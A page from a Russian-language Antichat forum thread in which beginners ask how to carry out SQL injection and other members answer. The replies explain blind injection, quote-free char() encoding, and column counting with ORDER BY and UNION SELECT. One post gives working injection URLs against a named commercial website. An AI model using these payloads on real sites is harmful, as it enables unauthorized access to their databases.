ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи > Авторские статьи
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #131  
Старый 21.01.2010, 17:33
Аватар для dimonle
dimonle
Новичок
Регистрация: 24.01.2009
Сообщений: 13
Провел на форуме:
156717

Репутация: 0
По умолчанию

спасибо,а если на подставление кавычки и также всего остального вообще ничего не выскакивает кавычка не фильруеццо типа %20 а просто страничка остается такая же то это блайнд?
 
Ответить с цитированием

  #132  
Старый 22.01.2010, 17:51
Аватар для dimonle
dimonle
Новичок
Регистрация: 24.01.2009
Сообщений: 13
Провел на форуме:
156717

Репутация: 0
По умолчанию

А есть какой то фак по блайнду?
 
Ответить с цитированием

  #133  
Старый 22.01.2010, 18:58
Аватар для Ctacok
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Цитата:
Сообщение от dimonle  
А есть какой то фак по блайнду?
https://forum.antichat.net/showpost.php?p=407227&postcount=3

 
Ответить с цитированием

  #134  
Старый 22.01.2010, 19:51
Аватар для LMaster
LMaster
Новичок
Регистрация: 15.06.2008
Сообщений: 13
Провел на форуме:
2427002

Репутация: 8
По умолчанию

Зачарь без кавычек. (http://jdstiles.com/java/cct.html)
Например: ... WHERE table_name=char(84, 65, 66, 76, 69)/*
 
Ответить с цитированием

  #135  
Старый 25.01.2010, 19:36
Аватар для CyberHunter
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031

Репутация: 256


Отправить сообщение для CyberHunter с помощью ICQ
По умолчанию

Вот несколько вопросов:
1. Вот есть сайт типа "бла-бла.ру/ид1", если я поставлю "ид1’ ", и выдаст ошибку, типа
Цитата:
mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in
, то что нужно делать дальше? подбирать количество строк? типа:
Цитата:
news.php?id=3+order+by+10
?, или количество полей? типа:
Цитата:
news.php?id=1' UNION SELECT 1--
?
2. И еще, если есть готовая уязвимость например:
Цитата:
сайт.ру/list.php?id=-1+UNION+SELECT+1,2--
, что сделать дальше, чтобы попасть в бд?
 
Ответить с цитированием

  #136  
Старый 25.01.2010, 20:35
Аватар для shell_c0de
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404

Репутация: 564
Отправить сообщение для shell_c0de с помощью ICQ Отправить сообщение для shell_c0de с помощью AIM
По умолчанию

2CyberHunter внимательно читай с первой страницы =\
 
Ответить с цитированием

  #137  
Старый 25.01.2010, 22:41
Аватар для CyberHunter
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031

Репутация: 256


Отправить сообщение для CyberHunter с помощью ICQ
По умолчанию

Цитата:
2CyberHunter внимательно читай с первой страницы =\
Перечитал раза три...
Я просто не знаю языка sql =(.
Но прочитал статью и понял, что можно и без этого)).
Так может ответите? Не доходит и все =..(
 
Ответить с цитированием

  #138  
Старый 25.01.2010, 23:42
Аватар для xcedz
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию

Цитата:
Сообщение от CyberHunter  
Перечитал раза три...
Я просто не знаю языка sql =(.
Но прочитал статью и понял, что можно и без этого)).
Так может ответите? Не доходит и все =..(
можно и без этого, читай все статьи.
 
Ответить с цитированием

  #139  
Старый 31.01.2010, 02:26
Аватар для Monsieur
Monsieur
Новичок
Регистрация: 17.01.2010
Сообщений: 4
Провел на форуме:
15042

Репутация: 5
По умолчанию

Цитата:
Сообщение от CyberHunter  
Вот несколько вопросов:
1. Вот есть сайт типа "бла-бла.ру/ид1", если я поставлю "ид1’ ", и выдаст ошибку, типа
, то что нужно делать дальше? подбирать количество строк? типа:
?, или количество полей? типа:
?
Оператором order by ты находишь количество полей.
Union select 1,2...-ты определяешь принтабельное поле(т.е. то,через которое ты будешь выводить информацию)
 
Ответить с цитированием

  #140  
Старый 21.03.2010, 21:12
Аватар для Strilo4ka
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию

Чатсный случай1
Хоть и баян, но
Код:
_http://www.laptopshowcase.co.uk/downloads.php?id=-1/*
Ошибка такого вида:
Цитата:
Error performing query: Mixing of GROUP columns (MIN(),MAX(),COUNT()...) with no GROUP columns is illegal if there is no GROUP BY clause
Код:
_http://www.laptopshowcase.co.uk/downloads.php?id=-1+group+by+1+union+select+1,2,version(),4,5,6,7,8,9,0,11/*
Терерь представляем себе что нет вывода ошибок!

Последний раз редактировалось Strilo4ka; 21.03.2010 в 21:19..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
SQL Injection: Modes of Attack, Defence, and Why It Matters bxN5 Forum for discussion of ANTICHAT 1 09.04.2007 19:07
SQL Injection FAQ bx_N Forum for discussion of ANTICHAT 2 08.03.2007 18:48
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ